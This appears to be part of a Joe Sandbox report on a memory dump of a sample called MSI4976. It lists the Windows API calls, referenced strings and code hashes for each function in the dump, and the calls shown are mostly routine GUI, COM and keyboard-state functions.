                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 52418ed2252ed586f57cd3eef8138c0ff9d746e8aa6ae588d7f8ed1d3373807e
                                        • Instruction ID: 7e135e65bf2218ec82b07f4d1dcae6d6f1aaeea70537825ed3768465e11517a2
                                        • Opcode Fuzzy Hash: 52418ed2252ed586f57cd3eef8138c0ff9d746e8aa6ae588d7f8ed1d3373807e
                                        • Instruction Fuzzy Hash: 92514F71B00209AFDB09CF68CD95EAEBBBAEB89301F15813DF916D76A0D7709D048B10
                                        APIs
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • GetSysColor.USER32(0000000F), ref: 0033B067
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 662572e8cf136c735e52b4f58e00098b606966b0c870478bea36260cf80e8fe4
                                        • Instruction ID: cf71f78a7e772982627264d202dc707795c035588cd9828ce3a909b8daab42d1
                                        • Opcode Fuzzy Hash: 662572e8cf136c735e52b4f58e00098b606966b0c870478bea36260cf80e8fe4
                                        • Instruction Fuzzy Hash: 4341A131100540AFDB27AF28DCD8BBA7B69AB06724F194365FE768A1E2D7318C41DB21
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                        • String ID:
                                        • API String ID: 136442275-0
                                        • Opcode ID: d5acae877f55a97e31f71704fa8db7ffd6f34d390c0f29441c1d0e2d9033c0f3
                                        • Instruction ID: 0913a015d4bf563365575accfc6e39a4a0ae38385c06595a2585adfd93327cf4
                                        • Opcode Fuzzy Hash: d5acae877f55a97e31f71704fa8db7ffd6f34d390c0f29441c1d0e2d9033c0f3
                                        • Instruction Fuzzy Hash: 8E411FB280452CAADB26EB50CC45EDE73BCAB48314F5081E6F519A6055EF71ABD4CFA0
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0038B204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID: @U=u
                                        • API String ID: 634782764-2594219639
                                        • Opcode ID: 9a18ab9599f91372f4cfe21d4022d1099709d002222cb8de42e45021773ca783
                                        • Instruction ID: 24c452079ad0355be9f2556966810a971420cd8d393e2f9b9a583b5df98e2478
                                        • Opcode Fuzzy Hash: 9a18ab9599f91372f4cfe21d4022d1099709d002222cb8de42e45021773ca783
                                        • Instruction Fuzzy Hash: 1A51A134500306BFEF32BF28CC99B9EBB69AB06350F204592FA55DA5E1C7B1E9548B50
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0039E9EA
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039EA0B
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0039EA20
                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0039EA3D
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0039EA64
                                        • DestroyCursor.USER32(00000000), ref: 0039EA6F
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0039EA8C
                                        • DestroyCursor.USER32(00000000), ref: 0039EA97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                        • String ID: @U=u
                                        • API String ID: 3992029641-2594219639
                                        • Opcode ID: 7ec55fdf68a4b5788edbd9c6e8a818744dea9ce15d50b413c11d70e4ae9115a7
                                        • Instruction ID: b685e770ae622f2c88ff475de1cbba23da03acd01376b6d8cf8d4d81a3ae6002
                                        • Opcode Fuzzy Hash: 7ec55fdf68a4b5788edbd9c6e8a818744dea9ce15d50b413c11d70e4ae9115a7
                                        • Instruction Fuzzy Hash: 51516870600605AFDB22DF69CCC2FAA77B9BB09754F104619F9869B6E0D7B0ED80DB50
                                        APIs
                                        • __swprintf.LIBCMT ref: 003284E5
                                        • __itow.LIBCMT ref: 00328519
                                          • Part of subcall function 00342177: _xtow@16.LIBCMT ref: 00342198
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf_xtow@16
                                        • String ID: %.15g$0x%p$False$True
                                        • API String ID: 1502193981-2263619337
                                        • Opcode ID: 2ee54f50f4cc830e5842a08e7e6b7cda8bd74ec582cebf29838103f672ffe2d3
                                        • Instruction ID: 510831f0f3e7747c3d8c30741881edd400864679a136272d68408a320ac38673
                                        • Opcode Fuzzy Hash: 2ee54f50f4cc830e5842a08e7e6b7cda8bd74ec582cebf29838103f672ffe2d3
                                        • Instruction Fuzzy Hash: 98412B316006159BDB27EF38E841F6A73E9FF45300F20446EE54ADB182EE31EA81CB50
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0035C782
                                        • GetDlgCtrlID.USER32 ref: 0035C78D
                                        • GetParent.USER32 ref: 0035C7A9
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0035C7AC
                                        • GetDlgCtrlID.USER32(?), ref: 0035C7B5
                                        • GetParent.USER32(?), ref: 0035C7D1
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0035C7D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 313823418-2258501812
                                        • Opcode ID: 5b9742f734abce70e0ddd0ec7c720dd054e12ea952b13126765a2066a7537c41
                                        • Instruction ID: 94b37032ea05d4cdeac944923f53329249ccaadb4fcf5cc7293828553729561a
                                        • Opcode Fuzzy Hash: 5b9742f734abce70e0ddd0ec7c720dd054e12ea952b13126765a2066a7537c41
                                        • Instruction Fuzzy Hash: 6321C474900208AFCB06EB60CC95DFE7769EF4A301F500115F922972E1DB785919DB20
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0035C869
                                        • GetDlgCtrlID.USER32 ref: 0035C874
                                        • GetParent.USER32 ref: 0035C890
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0035C893
                                        • GetDlgCtrlID.USER32(?), ref: 0035C89C
                                        • GetParent.USER32(?), ref: 0035C8B8
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0035C8BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 313823418-2258501812
                                        • Opcode ID: 81afee622451a63ce7e8ab3f8b44c1f51c426886e5b11c9bec6111f13cd4cbdf
                                        • Instruction ID: 3f3c55055525af4a425c76c99b845000dd0db3b6b62fd50fc71927f5cbdd56b3
                                        • Opcode Fuzzy Hash: 81afee622451a63ce7e8ab3f8b44c1f51c426886e5b11c9bec6111f13cd4cbdf
                                        • Instruction Fuzzy Hash: 1E21B375A00208BFDF06AB64CC85EFEB7B9EF45301F540015F912E71A1DB7859199B20
                                        APIs
                                        • GetParent.USER32 ref: 0035C8D9
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 0035C8EE
                                        • _wcscmp.LIBCMT ref: 0035C900
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0035C97B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend_wcscmp
                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1704125052-1428604138
                                        • Opcode ID: 8157373dafc8ec7c02f0996c7682c6fef2fd472a174a8b3d64286f1e43386700
                                        • Instruction ID: 59fc26168f15b9db58d7edc9517cdb3957d9a0f129b3246d40c50529ec73b8c0
                                        • Opcode Fuzzy Hash: 8157373dafc8ec7c02f0996c7682c6fef2fd472a174a8b3d64286f1e43386700
                                        • Instruction Fuzzy Hash: FF11E377258702BDFA072A30AC0ACE777DCDB17329B200017FD00A90E2FBA169454590
                                        APIs
                                        • _memset.LIBCMT ref: 00365816
                                        • GetMenuItemInfoW.USER32(003E18F0,000000FF,00000000,00000030), ref: 00365877
                                        • SetMenuItemInfoW.USER32(003E18F0,00000004,00000000,00000030), ref: 003658AD
                                        • Sleep.KERNEL32(000001F4), ref: 003658BF
                                        • GetMenuItemCount.USER32(?), ref: 00365903
                                        • GetMenuItemID.USER32(?,00000000), ref: 0036591F
                                        • GetMenuItemID.USER32(?,-00000001), ref: 00365949
                                        • GetMenuItemID.USER32(?,?), ref: 0036598E
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003659D4
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003659E8
                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00365A09
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                        • String ID:
                                        • API String ID: 4176008265-0
                                        • Opcode ID: b7274957070ab0c9935382d5587000702a4c742534a7a25b0fa0c048e69ed090
                                        • Instruction ID: 13cd449d658e898898e2b6bf794623ee11de4421057fb40ee59372649db27bf8
                                        • Opcode Fuzzy Hash: b7274957070ab0c9935382d5587000702a4c742534a7a25b0fa0c048e69ed090
                                        • Instruction Fuzzy Hash: 81619F71900689EFDF23CFA4C888AAE7BFDEB06358F158169F442A7255D731AD45CB20
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00389AA5
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00389AA8
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00389ACC
                                        • _memset.LIBCMT ref: 00389ADD
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00389AEF
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00389B67
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow_memset
                                        • String ID:
                                        • API String ID: 830647256-0
                                        • Opcode ID: 2869db3673bdfe24715d750f875ad62a262cb79219dcd6c9b3fa16062413cae5
                                        • Instruction ID: 5e65c83dff5addb71e9652605801b1b9e3e9e36899783860dacca6dba4e52f04
                                        • Opcode Fuzzy Hash: 2869db3673bdfe24715d750f875ad62a262cb79219dcd6c9b3fa16062413cae5
                                        • Instruction Fuzzy Hash: C8615C75A00258AFDB22DFA4CC81FEE77F8EF09700F14019AFA15AB2A1D774A945DB50
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00363591
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00363612
                                        • GetKeyState.USER32(000000A0), ref: 0036362D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00363647
                                        • GetKeyState.USER32(000000A1), ref: 0036365C
                                        • GetAsyncKeyState.USER32(00000011), ref: 00363674
                                        • GetKeyState.USER32(00000011), ref: 00363686
                                        • GetAsyncKeyState.USER32(00000012), ref: 0036369E
                                        • GetKeyState.USER32(00000012), ref: 003636B0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 003636C8
                                        • GetKeyState.USER32(0000005B), ref: 003636DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 863981ee86a5dc6952adf5abe71339867e8610057e2e34fbd340e44ac75fca04
                                        • Instruction ID: e22485a8d15f3dfd013df7ff924dec2d4d1e669d63a3d736d4a05023e4285b33
                                        • Opcode Fuzzy Hash: 863981ee86a5dc6952adf5abe71339867e8610057e2e34fbd340e44ac75fca04
                                        • Instruction Fuzzy Hash: 2241E1609047C97DFF339B64C8543A5BAA1AB13344F09C04DD6C3476C6EBA49BC88BA2
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0035A2AA
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0035A2F5
                                        • VariantInit.OLEAUT32(?), ref: 0035A307
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0035A327
                                        • VariantCopy.OLEAUT32(?,?), ref: 0035A36A
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0035A37E
                                        • VariantClear.OLEAUT32(?), ref: 0035A393
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0035A3A0
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0035A3A9
                                        • VariantClear.OLEAUT32(?), ref: 0035A3BB
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0035A3C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 900aa3de839148e82dd9aa3e073c7e5191b9189f3ee558064dc94362455db9b4
                                        • Instruction ID: c165bab3c85cf1aec581fd292d68ae308e1c90c806822afb19bd58a269a0c56b
                                        • Opcode Fuzzy Hash: 900aa3de839148e82dd9aa3e073c7e5191b9189f3ee558064dc94362455db9b4
                                        • Instruction Fuzzy Hash: AE415E75900219AFDB02DFA5DC84DDEBFB9FF09305F008065F912A7261DB34AA49DBA1
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • CoInitialize.OLE32 ref: 0037B298
                                        • CoUninitialize.COMBASE ref: 0037B2A3
                                        • CoCreateInstance.COMBASE(?,00000000,00000017,003AD8FC,?), ref: 0037B303
                                        • IIDFromString.COMBASE(?,?), ref: 0037B376
                                        • VariantInit.OLEAUT32(?), ref: 0037B410
                                        • VariantClear.OLEAUT32(?), ref: 0037B471
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 834269672-1287834457
                                        • Opcode ID: dcafabffd2618da4ac023949e5b217903080fe0abffb783b38fc1a6ed6e9a235
                                        • Instruction ID: 35ad421dcc7de52439c4a57a40ab465cc181242a2eeb76058e69795408628f7a
                                        • Opcode Fuzzy Hash: dcafabffd2618da4ac023949e5b217903080fe0abffb783b38fc1a6ed6e9a235
                                        • Instruction Fuzzy Hash: CC61AD312047019FD722DF54C885B6EF7F8AF49714F008819F9899B291C774ED84CB92
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 0033C2D2
                                          • Part of subcall function 0033C697: GetClientRect.USER32(?,?), ref: 0033C6C0
                                          • Part of subcall function 0033C697: GetWindowRect.USER32(?,?), ref: 0033C701
                                          • Part of subcall function 0033C697: ScreenToClient.USER32(?,000000FF), ref: 0033C729
                                        • GetDC.USER32 ref: 0039E006
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0039E019
                                        • SelectObject.GDI32(00000000,00000000), ref: 0039E027
                                        • SelectObject.GDI32(00000000,00000000), ref: 0039E03C
                                        • ReleaseDC.USER32(?,00000000), ref: 0039E044
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0039E0CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: @U=u$U
                                        • API String ID: 4009187628-4110099822
